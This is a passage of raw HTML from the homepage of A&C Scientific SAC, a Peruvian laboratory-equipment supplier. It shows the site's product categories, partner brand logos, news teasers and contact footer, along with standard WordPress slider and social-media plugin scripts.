href="http://acssac.com/consultoria/tecnicas-en-biologia-molecular-y-celular/">Consultoría</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-783"><a href="http://www.acssac.com/consultoria/tecnicas-en-biologia-molecular-y-celular/">Técnicas en Biología Molecular y Celular</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1129"><a href="http://www.acssac.com/consultoria/financiamiento-para-proyectos-de-inversion/">Financiamiento para proyectos de Inversión</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1128"><a href="http://www.acssac.com/consultoria/alquiler-de-equipos-cientificos/">Alquiler de equipos cientificos</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1130"><a href="http://www.acssac.com/consultoria/soporte-cientifico-y-academico/">Soporte Científico y Académico</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-659"><a href="http://www.acssac.com/aliados/">Aliados</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-660"><a href="http://www.acssac.com/blog/">Noticias</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-664"><a href="http://www.acssac.com/contacto/">Contacto</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-663"><a href="http://www.acssac.com/servicio-tecnico/">Servicio Técnico</a></li> </ul> </li> </ul> </nav> <div class="login"><a href="#popup_login" class="popup_link popup_login_link icon-user">Login</a> </div> </div> <div class="panel_middle"> <div class="top_panel_top_user_area"> <ul id="menu_user" class="menu_user_nav"> </ul> </div> </div> <div class="panel_bottom"> <div class="contact_socials"> </div> </div> </div> <div class="mask"></div> </div> <div class="page_content_wrap page_paddings_no"> <div class="content_wrap"><div class="content"><article class="itemscope post_item post_item_single post_featured_center post_format_standard post-137 page type-page status-publish hentry" itemscope itemtype="http://schema.org/Article"><section class="post_content" itemprop="articleBody"><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <!-- MasterSlider --> <div id="P_MS5cdd7ef3cec9f" class="master-slider-parent msl ms-parent-id-2" > <!-- MasterSlider Main --> <div id="MS5cdd7ef3cec9f" class="master-slider ms-skin-default" > <div class="ms-slide" data-delay="3" data-fill-mode="fill" > <img src="http://www.acssac.com/wp-content/plugins/master-slider/public/assets/css/blank.gif" alt="" title="" data-src="http://www.acssac.com/wp-content/uploads/2019/02/nasco4.png" /> <div class="ms-thumb" ><div class="ms-tab-context"><div class=&quot;ms-tab-context&quot;></div></div> </div> </div> <div class="ms-slide" data-delay="3.5" data-fill-mode="fill" > <img src="http://www.acssac.com/wp-content/plugins/master-slider/public/assets/css/blank.gif" alt="" title="" data-src="http://www.acssac.com/wp-content/uploads/2017/06/4-1.jpg" /> <div class="ms-thumb" ><div class="ms-tab-context"><div class=&quot;ms-tab-context&quot;></div></div> </div> </div> </div> <!-- END MasterSlider Main --> </div> <!-- END MasterSlider --> <script> (function ( $ ) { "use strict"; $(function () { var masterslider_ec9f = new MasterSlider(); // slider controls masterslider_ec9f.control('arrows' ,{ autohide:true, overVideo:true }); masterslider_ec9f.control('bullets' ,{ autohide:true, overVideo:true, dir:'h', align:'bottom' , margin:10 }); // slider setup masterslider_ec9f.setup("MS5cdd7ef3cec9f", { width : 1903, height : 552, minHeight : 0, space : 0, start : 1, grabCursor : true, swipe : true, mouse : true, layout : "fullwidth", wheel : false, autoplay : true, instantStartLayers:false, loop : true, shuffle : false, preload : 0, heightLimit : true, autoHeight : true, smoothHeight : true, endPause : false, overPause : false, fillMode : "fill", centerControls : true, startOnAppear : true, layersMode : "center", hideLayers : false, fullscreenMargin: 0, speed : 15, dir : "h", parallaxMode : 'swipe', view : "basic" }); window.masterslider_instances = window.masterslider_instances || []; window.masterslider_instances.push( masterslider_ec9f ); }); })(jQuery); </script> </div> </div> </div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1550613852453"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <style> #wpls-logo-showcase-slider-1 .wp-post-image, #wpls-logo-showcase-slider-1 .wp-post-image img.wp-post-image{max-height:250px; } </style> <div class="wpls-logo-showcase-slider-wrp wpls-logo-clearfix"> <div class="wpls-logo-showcase logo_showcase wpls-logo-slider wpls-design-1 sliderimage_hide_border" id="wpls-logo-showcase-slider-1" > <div class="wpls-logo-cnt" title="Arctiko"> <div class="wpls-fix-box"> <a href="https://www.arctiko.com/" target="_self"> <img class="wp-post-image" src="http://www.acssac.com/wp-content/uploads/2019/02/arctiko2.jpg" alt="" /> </a> </div> </div> <div class="wpls-logo-cnt" title="bruker"> <div class="wpls-fix-box"> <a href="https://www.bruker.com/" target="_self"> <img class="wp-post-image" src="http://www.acssac.com/wp-content/uploads/2019/02/bruker_logo2.png" alt="" /> </a> </div> </div> <div class="wpls-logo-cnt" title="btx"> <div class="wpls-fix-box"> <a href="https://www.btxonline.com/" target="_self"> <img class="wp-post-image" src="http://www.acssac.com/wp-content/uploads/2019/02/btx2.png" alt="" /> </a> </div> </div> <div class="wpls-logo-cnt" title="cryste"> <div class="wpls-fix-box"> <a href="http://www.cryste.co.kr/" target="_self"> <img class="wp-post-image" src="http://www.acssac.com/wp-content/uploads/2019/02/cryste2.jpg" alt="" /> </a> </div> </div> <div class="wpls-logo-cnt" title="hoefer"> <div class="wpls-fix-box"> <a href="https://www.hoeferinc.com/" target="_self"> <img class="wp-post-image" src="http://www.acssac.com/wp-content/uploads/2019/02/hoefer2.jpg" alt="" /> </a> </div> </div> <div class="wpls-logo-cnt" title="Jasco"> <div class="wpls-fix-box"> <a href="https://jascoinc.com/" target="_self"> <img class="wp-post-image" src="http://www.acssac.com/wp-content/uploads/2019/02/jasco.jpg" alt="" /> </a> </div> </div> <div class="wpls-logo-cnt" title="knf"> <div class="wpls-fix-box"> <a href="https://www.knf.com/home/" target="_self"> <img class="wp-post-image" src="http://www.acssac.com/wp-content/uploads/2019/02/knf.png" alt="" /> </a> </div> </div> <div class="wpls-logo-cnt" title="mpbio"> <div class="wpls-fix-box"> <a href="https://www.mpbio.com/" target="_self"> <img class="wp-post-image" src="http://www.acssac.com/wp-content/uploads/2019/02/mpbio.jpg" alt="" /> </a> </div> </div> <div class="wpls-logo-cnt" title="nasco"> <div class="wpls-fix-box"> <a href="https://www.enasco.com/" target="_self"> <img class="wp-post-image" src="http://www.acssac.com/wp-content/uploads/2019/02/nasco-1.jpg" alt="" /> </a> </div> </div> <div class="wpls-logo-cnt" title="tecniplast"> <div class="wpls-fix-box"> <a href="http://www.tecniplast.it/" target="_self"> <img class="wp-post-image" src="http://www.acssac.com/wp-content/uploads/2019/02/tecniplast.jpg" alt="" /> </a> </div> </div> <div class="wpls-logo-cnt" title="thermo"> <div class="wpls-fix-box"> <a href="https://www.thermofisher.com/pe/en/home.html" target="_self"> <img class="wp-post-image" src="http://www.acssac.com/wp-content/uploads/2019/02/thermo.png" alt="" /> </a> </div> </div> <div class="wpls-logo-cnt" title="zymo"> <div class="wpls-fix-box"> <a href="https://www.zymoresearch.eu/" target="_self"> <img class="wp-post-image" src="http://www.acssac.com/wp-content/uploads/2019/02/zymo2.png" alt="" /> </a> </div> </div> </div> <div class="wpls-logo-showacse-slider-conf" data-conf="{&quot;slides_column&quot;:&quot;4&quot;,&quot;slides_scroll&quot;:&quot;1&quot;,&quot;dots&quot;:&quot;true&quot;,&quot;arrows&quot;:&quot;true&quot;,&quot;autoplay&quot;:&quot;true&quot;,&quot;autoplay_interval&quot;:&quot;2000&quot;,&quot;loop&quot;:&quot;true&quot;,&quot;rtl&quot;:&quot;false&quot;,&quot;speed&quot;:&quot;1000&quot;,&quot;center_mode&quot;:&quot;false&quot;}"></div> </div> </div> </div> </div></div></div></div><div class="vc_row wpb_row vc_row-fluid vc_custom_1456238859234"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="sc_section margin_top_tiny margin_bottom_tiny aligncenter" data-animation="animated zoomIn normal"><div class="sc_section_inner"><span class="sc_highlight" style="color:#595959;font-size:24px; line-height: 1em;"></p> <p style="text-align: center;">&#8211; Somos una empresa tecnológica cuyo objetivo es ofrecer soluciones para los Laboratorios &#8211;</p> <p></span></div></div></div></div></div></div><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"></div></div></div></div><div class="vc_row-full-width"></div><div data-vc-full-width="true" data-vc-full-width-init="false" class="vc_row wpb_row vc_row-fluid vc_custom_1456239000515"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="sc_section" data-animation="animated zoomIn normal"><div class="sc_section_inner"><h6 class="sc_section_subtitle sc_item_subtitle">Conoce</h6><h2 class="sc_section_title sc_item_title">Nuestra amplia gama de soluciones</h2><div class="columns_wrap sc_columns columns_nofluid sc_columns_count_4 margin_top_large"><div class="column-1_4 sc_column_item sc_column_item_1 odd first"><h2 class="sc_title sc_title_regular margin_bottom_tiny">Analítica</h2> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p>Explora el amplio rango de productos</p> </div> </div> <div class="sc_line sc_line_position_center_center sc_line_style_dotted" style="margin-bottom: 0.5rem !important; margin-top: 1.4rem !important;border-top-style:dotted;"></div><ul class="sc_list sc_list_style_ul"><li class="sc_list_item odd first" title="Cromatografía"><span>Cromatografía</span></li><li class="sc_list_item even" title="Espectroscopía"><span>Espectroscopía</span></li><li class="sc_list_item odd" title="Columnas para HPLC"><span>Columnas para HPLC</span></li></ul></div><div class="column-1_4 sc_column_item sc_column_item_2 even"><h2 class="sc_title sc_title_regular margin_bottom_tiny">Biología Molecular</h2> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p>Las mejores plataformas disponibles</p> </div> </div> <div class="sc_line sc_line_position_center_center sc_line_style_dotted" style="margin-bottom: 0.5rem !important; margin-top: 1.4rem !important;border-top-style:dotted;"></div><ul class="sc_list sc_list_style_ul"><li class="sc_list_item odd first" title="Equipo de PCR en tiempo real AriaMX"><span>Equipo de PCR en tiempo real AriaMX</span></li><li class="sc_list_item even" title="Bioanalizador"><span>Bioanalizador</span></li><li class="sc_list_item odd" title="SureScan"><span>SureScan</span></li><li class="sc_list_item even" title="Surecycler 8800"><span>Surecycler 8800</span></li><li class="sc_list_item odd" title="Fastprep-96"><span>Fastprep-96</span></li><li class="sc_list_item even" title="Tapestation"><span>Tapestation</span></li><li class="sc_list_item odd" title="Fastprep-24"><span>Fastprep-24</span></li></ul></div><div class="column-1_4 sc_column_item sc_column_item_3 odd"><h2 class="sc_title sc_title_regular margin_bottom_tiny">Imágenes</h2> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p>Imagen de Resonancia Magnética Preclínica <strong>MRI</strong></p> </div> </div> <div class="sc_line sc_line_position_center_center sc_line_style_dotted" style="margin-bottom: 0.5rem !important; margin-top: 1.4rem !important;border-top-style:dotted;"></div><ul class="sc_list sc_list_style_ul"><li class="sc_list_item odd first" title="ICON"><span>ICON</span></li><li class="sc_list_item even" title="BioSpec 3T"><span>BioSpec 3T</span></li><li class="sc_list_item odd" title="PharmaScan"><span>PharmaScan</span></li></ul></div><div class="column-1_4 sc_column_item sc_column_item_4 even"><h2 class="sc_title sc_title_regular margin_bottom_tiny">BIOTERIOS</h2> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p>Lo ayudamos en la planificación y diseño de su Bioterio, contamos con las marcas más prestigiosas de equipos para el alojamiento de los animales de laboratorio.</p> </div> </div> <div class="sc_line sc_line_position_center_center sc_line_style_dotted" style="margin-bottom: 0.5rem !important; margin-top: 1.4rem !important;border-top-style:dotted;"></div><ul class="sc_list sc_list_style_ul"></ul></div></div></div></div></div></div></div></div><div class="vc_row-full-width"></div><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" class="vc_row wpb_row vc_row-fluid vc_row-no-padding"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="sc_line sc_line_position_center_center sc_line_style_dotted" style="border-top-style:dotted;"></div><div class="sc_content content_wrap"><div class="sc_section" data-animation="animated zoomIn normal"><div class="sc_section_inner"><div id="sc_blogger_1061418125" class="sc_blogger layout_classic_3 template_masonry sc_blogger_horizontal no_description"><h2 class="sc_blogger_title sc_item_title">Noticias & Eventos</h2><div class="isotope_wrap" data-columns="3"> <div class="isotope_item isotope_item_classic isotope_item_classic_3 isotope_column_3 "> <div class="post_item post_item_classic post_item_classic_3 post_format_standard odd"> <div class="post_info"> <span class="post_info_item post_info_posted"> <a href="http://www.acssac.com/2019/04/16/el-pez-cebra/" class="post_info_date">April 16, 2019</a></span> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_views icon-eye" title="Views - 107" href="http://www.acssac.com/2019/04/16/el-pez-cebra/"><span class="post_counters_number">107</span></a> <a class="post_counters_item post_counters_comments icon-comment" title="Comments - 0" href="http://www.acssac.com/2019/04/16/el-pez-cebra/#respond"><span class="post_counters_number">0</span></a> </span> </div> <h3 class="post_title"><a href="http://www.acssac.com/2019/04/16/el-pez-cebra/">EL PEZ CEBRA</a></h3> <div class="post_content isotope_item_content"> <div class="post_descr"> <p>El pez cebra es actualmente uno de los modelos animales más importantes en la investigación biomédica en todo el mundo. Originalmente desarrollado en la década de...</p><a href="http://www.acssac.com/2019/04/16/el-pez-cebra/" class="sc_button sc_button_square sc_button_style_default sc_button_size_small">Read more</a> </div> </div> <!-- /.post_content --> </div> <!-- /.post_item --> </div> <!-- /.isotope_item --> <div class="isotope_item isotope_item_classic isotope_item_classic_3 isotope_column_3 "> <div class="post_item post_item_classic post_item_classic_3 post_format_standard even"> <div class="post_info"> <span class="post_info_item post_info_posted"> <a href="http://www.acssac.com/2019/01/03/primer-bioterio-automatizado-en-el-peru/" class="post_info_date">January 3, 2019</a></span> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_views icon-eye" title="Views - 615" href="http://www.acssac.com/2019/01/03/primer-bioterio-automatizado-en-el-peru/"><span class="post_counters_number">615</span></a> <a class="post_counters_item post_counters_comments icon-comment" title="Comments - 0" href="http://www.acssac.com/2019/01/03/primer-bioterio-automatizado-en-el-peru/#respond"><span class="post_counters_number">0</span></a> </span> </div> <h3 class="post_title"><a href="http://www.acssac.com/2019/01/03/primer-bioterio-automatizado-en-el-peru/">Primer Bioterio Automatizado en el Peru</a></h3> <div class="post_content isotope_item_content"> <div class="post_descr"> <p>Con la ayuda de Innóvate Peru, la Universidad Andina del Cusco pudo adquirir un sistema completo de Bioterios (Donde viven roedores ) que cuenta con toda la...</p><a href="http://www.acssac.com/2019/01/03/primer-bioterio-automatizado-en-el-peru/" class="sc_button sc_button_square sc_button_style_default sc_button_size_small">Read more</a> </div> </div> <!-- /.post_content --> </div> <!-- /.post_item --> </div> <!-- /.isotope_item --> <div class="isotope_item isotope_item_classic isotope_item_classic_3 isotope_column_3 "> <div class="post_item post_item_classic post_item_classic_3 post_format_standard odd last"> <div class="post_info"> <span class="post_info_item post_info_posted"> <a href="http://www.acssac.com/2018/09/07/seminario-internacional-knf-2/" class="post_info_date">September 7, 2018</a></span> <span class="post_info_item post_info_counters"> <a class="post_counters_item post_counters_views icon-eye" title="Views - 401" href="http://www.acssac.com/2018/09/07/seminario-internacional-knf-2/"><span class="post_counters_number">401</span></a> <a class="post_counters_item post_counters_comments icon-comment" title="Comments - 0" href="http://www.acssac.com/2018/09/07/seminario-internacional-knf-2/#respond"><span class="post_counters_number">0</span></a> </span> </div> <h3 class="post_title"><a href="http://www.acssac.com/2018/09/07/seminario-internacional-knf-2/">AREQUIPA | Seminario Internacional de Bombas, sistemas de Vacio y Rotaevaporador para laboratorios</a></h3> <div class="post_content isotope_item_content"> <div class="post_descr"> <p>Fecha: Martes 18 de Setiembre del 2018 Lugar: Universidad Católica De Santa María &#8211; Arequipa Conferencista: Ing. Gunter Bostelmann &#8211; KNF de Alemania...</p><a href="http://www.acssac.com/2018/09/07/seminario-internacional-knf-2/" class="sc_button sc_button_square sc_button_style_default sc_button_size_small">Read more</a> </div> </div> <!-- /.post_content --> </div> <!-- /.post_item --> </div> <!-- /.isotope_item --> </div></div></div></div></div></div></div></div></div><div class="vc_row-full-width"></div><div data-vc-full-width="true" data-vc-full-width-init="false" class="vc_row wpb_row vc_row-fluid vc_custom_1456159616762"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="sc_section margin_top_null aligncenter" data-animation="animated zoomIn normal"><div class="sc_section_inner"><div class="sc_line sc_line_position_center_center sc_line_style_solid" style="display: inline-block;width:150px;border-top-width:4px;border-top-style:solid;border-top-color:#5c5551;"></div><div class="sc_section"><div class="sc_section_inner"><h6 class="sc_section_subtitle sc_item_subtitle">¿Necesitas ayuda?</h6><h2 class="sc_section_title sc_item_title">Nos pondremos en contacto enseguida</h2><a href="http://acssac.com/contacto/" class="sc_button sc_button_square sc_button_style_filled sc_button_size_small" style="padding-left: 3.1em; padding-right: 3.1em;">Contactanos</a></div></div></div></div></div></div></div></div><div class="vc_row-full-width"></div></section> <!-- </section> class="post_content" itemprop="articleBody"> --></article> <!-- </article> class="itemscope post_item post_item_single post_featured_center post_format_standard post-137 page type-page status-publish hentry" itemscope itemtype="http://schema.org/Article"> --> <section class="related_wrap related_wrap_empty"></section> </div> <!-- </div> class="content"> --></div> <!-- </div> class="content_wrap"> --> </div> <!-- </.page_content_wrap> --> <footer class="footer_wrap widget_area scheme_original"> <div class="footer_wrap_inner widget_area_inner"> <div class="content_wrap"> <div class="columns_wrap"><aside id="media_image-2" class="widget_number_1 column-1_3 widget widget_media_image"><img width="291" height="70" src="http://www.acssac.com/wp-content/uploads/2017/06/logo-footer.fw_.png" class="image wp-image-668 attachment-full size-full" alt="" style="max-width: 100%; height: auto;" /></aside><aside id="text-3" class="widget_number_2 column-1_3 widget widget_text"><h5 class="widget_title">Sobre Nosotros</h5> <div class="textwidget"><p>Somos una empresa comprometida con la investigación medica, científica e industrial, la protección y el control del medio ambiente, la biotecnología y la medicina. Ofrecemos consultoría integral para optimizar sus procesos de investigación y desarrollo ofreciendo tecnología y optimización.</p> </div> </aside><aside id="text-4" class="widget_number_3 column-1_3 widget widget_text"><h5 class="widget_title">Contáctanos</h5> <div class="textwidget"><p>Jr. Trujillo #531<br /> Magdalena del Mar, Lima<br /> Email:[email protected]<br /> Tel: +1 705 8924<br /> Cel: 975 244 656</p> <p>&nbsp;</p> </div> </aside></div> <!-- /.columns_wrap --> </div> <!-- /.content_wrap --> </div> <!-- /.footer_wrap_inner --> </footer> <!-- /.footer_wrap --> <div class="copyright_wrap copyright_style_text scheme_original"> <div class="copyright_wrap_inner"> <div class="content_wrap"> <div class="copyright_text">A&amp;C Scientific SAC © 2019 Todos los derechos reservados</div> </div> </div> </div> </div> <!-- /.page_wrap --> </div> <!-- /.body_wrap --> <a href="#" class="scroll_to_top icon-up" title="Scroll to top"></a> <div class="custom_html_section"> </div> <!--facebook like and share js --> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.5"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <!--<div id="fb-root"></div> <script> (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=1425108201100352&version=v2.0"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script>--> <!-- twitter JS End --> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="https://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script> <script> jQuery( document ).scroll(function( $ ) { var y = jQuery(this).scrollTop(); if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) { if(jQuery(window).scrollTop() + jQuery(window).height() >= jQuery(document).height()-100) { jQuery('.sfsi_outr_div').css({'z-index':'9996',opacity:1,top:jQuery(window).scrollTop()+"px",position:"absolute"}); jQuery('.sfsi_outr_div').fadeIn(200); jQuery('.sfsi_FrntInner_chg').fadeIn(200); } else{ jQuery('.sfsi_outr_div').fadeOut(); jQuery('.sfsi_FrntInner_chg').fadeOut(); } } else { if(jQuery(window).scrollTop() + jQuery(window).height() >= jQuery(document).height()-3) { jQuery('.sfsi_outr_div').css({'z-index':'9996',opacity:1,top:jQuery(window).scrollTop()+200+"px",position:"absolute"}); jQuery('.sfsi_outr_div').fadeIn(200); jQuery('.sfsi_FrntInner_chg').fadeIn(200); } else { jQuery('.sfsi_outr_div').fadeOut(); jQuery('.sfsi_FrntInner_chg').fadeOut(); } } }); </script> <style type="text/css">#sfsi_floater { margin-bottom:0px;margin-right:0px; }</style><div class="norm_row sfsi_wDiv" id="sfsi_floater" style="z-index: 9999;width:225px;text-align:left;position:absolute;position:absolute;right:30px;bottom:0px"><div style='width:40px; height:40px;margin-left:5px;margin-bottom:5px;' class='sfsi_wicons shuffeldiv '><div class='inerCnt'><a class=' sficn' effect='' target='_blank' href='https://www.facebook.com/acscien/' id='sfsiid_facebook' alt='Facebook' style='opacity:1' ><img alt='Facebook' title='Facebook' src='http://www.acssac.com/wp-content/plugins/ultimate-social-media-icons/images/icons_theme/flat/flat_facebook.png' width='40' height='40' style='' class='sfcm sfsi_wicon' effect='' /></a><div class="sfsi_tool_tip_2 fb_tool_bdr sfsiTlleft" style="width:62px ;opacity:0;z-index:-1;margin-left:-47.5px;" id="sfsiid_facebook"><span class="bot_arow bot_fb_arow"></span><div class="sfsi_inside"><div class='icon1'><a href='https://www.facebook.com/acscien/' target='_blank'><img alt='Facebook' title='Facebook' src='http://www.acssac.com/wp-content/plugins/ultimate-social-media-icons/images/visit_icons/facebook.png' /></a></div><div class='icon2'><div class="fb-like" data-href="http://www.acssac.com" data-layout="button" data-action="like" data-show-faces="false" data-share="true"></div></div><div class='icon3'><div class="fb-share-button" data-href="http://www.acssac.com" data-layout="button"></div></div></div></div></div></div><div style='width:40px; height:40px;margin-left:5px;margin-bottom:5px;' class='sfsi_wicons shuffeldiv '><div class='inerCnt'><a class=' sficn' effect='' target='_blank' href='https://twitter.com/scientific_sac' id='sfsiid_twitter' alt='Twitter' style='opacity:1' ><img alt='Twitter' title='Twitter' src='http://www.acssac.com/wp-content/plugins/ultimate-social-media-icons/images/icons_theme/flat/flat_twitter.png' width='40' height='40' style='' class='sfcm sfsi_wicon' effect='' /></a><div class="sfsi_tool_tip_2 twt_tool_bdr sfsiTlleft" style="width:59px ;opacity:0;z-index:-1;margin-left:-46px;" id="sfsiid_twitter"><span class="bot_arow bot_twt_arow"></span><div class="sfsi_inside"><div class='cstmicon1'><a href='https://twitter.com/scientific_sac' target='_blank'><img alt='Visit Us' title='Visit Us' src='http://www.acssac.com/wp-content/plugins/ultimate-social-media-icons/images/visit_icons/twitter.png' /></a></div><div class='icon1'><a href="https://twitter.com/https://twitter.com/scientific_sac" class="twitter-follow-button" data-show-count="false" data-show-screen-name="false">Follow </a></div><div class='icon2'><a rel="nofollow" href="http://twitter.com/share" data-count="none" class="sr-twitter-button twitter-share-button" lang="en" data-url="http://www.acssac.com" data-text="Hey, check out this cool site I found: www.yourname.com #Topic via@my_twitter_name" ></a></div></div></div></div></div></div ><input type='hidden' id='sfsi_floater_sec' value='bottom-right' /></div><script>jQuery(".sfsi_widget").each(function( index ) { if(jQuery(this).attr("data-position") == "widget") { var wdgt_hght = jQuery(this).children(".norm_row.sfsi_wDiv").height(); var title_hght = jQuery(this).parent(".widget.sfsi").children(".widget-title").height(); var totl_hght = parseInt( title_hght ) + parseInt( wdgt_hght ); jQuery(this).parent(".widget.sfsi").css("min-height", totl_hght+"px"); } });jQuery( document ).ready(function( $ ) { sfsi_float_widget('bottom')});</script> <script> jQuery(document).ready(function(e) { jQuery("body").addClass("sfsi_2.08") }); function sfsi_processfurther(ref) { var feed_id = 'YmRXYVJ3Q0EwVmk4TWNNM2hRb09XWFl5ajZCb0s2MHhPS3RxMmdSZDJKdzFTNkE2SHNYTkJHUExMMmVnL0hTSEFCUWs1N1F4ekw2Ni9XZXVWeXN2Tm9DY1lXWkg3b2NtZDdNaVU1RGQ0SGNJZ0RqWGsrSER5QUZTZWVWRjVtUW98S1FyREU4a0dhOGtkSXkzRk45TmRIcHZoT2syS0Q4VUhsdVNVYnlXaDVvaz0='; var feedtype = 8; var email = jQuery(ref).find('input[name="data[Widget][email]"]').val(); var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if ((email != "Enter your email") && (filter.test(email))) { if (feedtype == "8") { var url ="https://www.specificfeeds.com/widgets/subscribeWidget/"+feed_id+"/"+feedtype; window.open(url, "popupwindow", "scrollbars=yes,width=1080,height=760"); return true; } } else { alert("Please enter email address"); jQuery(ref).find('input[name="data[Widget][email]"]').focus(); return false; } } </script> <style type="text/css" aria-selected="true"> .sfsi_subscribe_Popinner { width: 100% !important; height: auto !important; padding: 18px 0px !important; background-color: #ffffff !important; } .sfsi_subscribe_Popinner form { margin: 0 20px !important; } .sfsi_subscribe_Popinner h5 { font-family: Helvetica,Arial,sans-serif !important; font-weight: bold !important; color: #000000 !important; font-size: 16px !important; text-align: center !important; margin: 0 0 10px !important; padding: 0 !important; } .sfsi_subscription_form_field { margin: 5px 0 !important; width: 100% !important; display: inline-flex; display: -webkit-inline-flex; } .sfsi_subscription_form_field input { width: 100% !important; padding: 10px 0px !important; } .sfsi_subscribe_Popinner input[type=email] { font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: !important; font-size: 14px !important; text-align: center !important; } .sfsi_subscribe_Popinner input[type=email]::-webkit-input-placeholder { font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: !important; font-size: 14px !important; text-align: center !important; } .sfsi_subscribe_Popinner input[type=email]:-moz-placeholder { /* Firefox 18- */ font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: !important; font-size: 14px !important; text-align: center !important; } .sfsi_subscribe_Popinner input[type=email]::-moz-placeholder { /* Firefox 19+ */ font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: !important; font-size: 14px !important; text-align: center !important; } .sfsi_subscribe_Popinner input[type=email]:-ms-input-placeholder { font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: !important; font-size: 14px !important; text-align: center !important; } .sfsi_subscribe_Popinner input[type=submit] { font-family: Helvetica,Arial,sans-serif !important; font-weight: bold !important; color: #000000 !important; font-size: 16px !important; text-align: center !important; background-color: #dedede !important; } </style> <script type="text/javascript">if (typeof ALBERTINO_STORAGE == 'undefined') var ALBERTINO_STORAGE = {};if (ALBERTINO_STORAGE['theme_font']=='') ALBERTINO_STORAGE['theme_font'] = 'Roboto Slab';ALBERTINO_STORAGE['theme_skin_color'] = '#45403d';ALBERTINO_STORAGE['theme_skin_bg_color'] = '#ffffff';</script><script type="text/javascript">if (typeof ALBERTINO_STORAGE == 'undefined') var ALBERTINO_STORAGE = {};ALBERTINO_STORAGE["strings"] = {ajax_error: "Invalid server answer",bookmark_add: "Add the bookmark",bookmark_added: "Current page has been successfully added to the bookmarks. You can see it in the right panel on the tab &#039;Bookmarks&#039;",bookmark_del: "Delete this bookmark",bookmark_title: "Enter bookmark title",bookmark_exists: "Current page already exists in the bookmarks list",search_error: "Error occurs in AJAX search! Please, type your query and press search icon for the traditional search way.",email_confirm: "On the e-mail address &quot;%s&quot; we sent a confirmation email. Please, open it and click on the link.",reviews_vote: "Thanks for your vote! New average rating is:",reviews_error: "Error saving your vote! Please, try again later.",error_like: "Error saving your like! Please, try again later.",error_global: "Global error text",name_empty: "The name can&#039;t be empty",name_long: "Too long name",email_empty: "Too short (or empty) email address",email_long: "Too long email address",email_not_valid: "Invalid email address",subject_empty: "The subject can&#039;t be empty",subject_long: "Too long subject",text_empty: "The message text can&#039;t be empty",text_long: "Too long message text",send_complete: "Send message complete!",send_error: "Transmit failed!",login_empty: "The Login field can&#039;t be empty",login_long: "Too long login field",login_success: "Login success! The page will be reloaded in 3 sec.",login_failed: "Login failed!",password_empty: "The password can&#039;t be empty and shorter then 4 characters",password_long: "Too long password",password_not_equal: "The passwords in both fields are not equal",registration_success:"Registration success! Please log in!",registration_failed: "Registration failed!",geocode_error: "Geocode was not successful for the following reason:",googlemap_not_avail: "Google map API not available!",editor_save_success: "Post content saved!",editor_save_error: "Error saving post data!",editor_delete_post: "You really want to delete the current post?",editor_delete_post_header:"Delete post",editor_delete_success: "Post deleted!",editor_delete_error: "Error deleting post!",editor_caption_cancel: "Cancel",editor_caption_close: "Close"};</script><script type="text/javascript">if (typeof ALBERTINO_STORAGE == 'undefined') var ALBERTINO_STORAGE = {};ALBERTINO_STORAGE['ajax_url'] = 'http://www.acssac.com/wp-admin/admin-ajax.php';ALBERTINO_STORAGE['ajax_nonce'] = 'd38ab3c1ae';ALBERTINO_STORAGE['site_url'] = 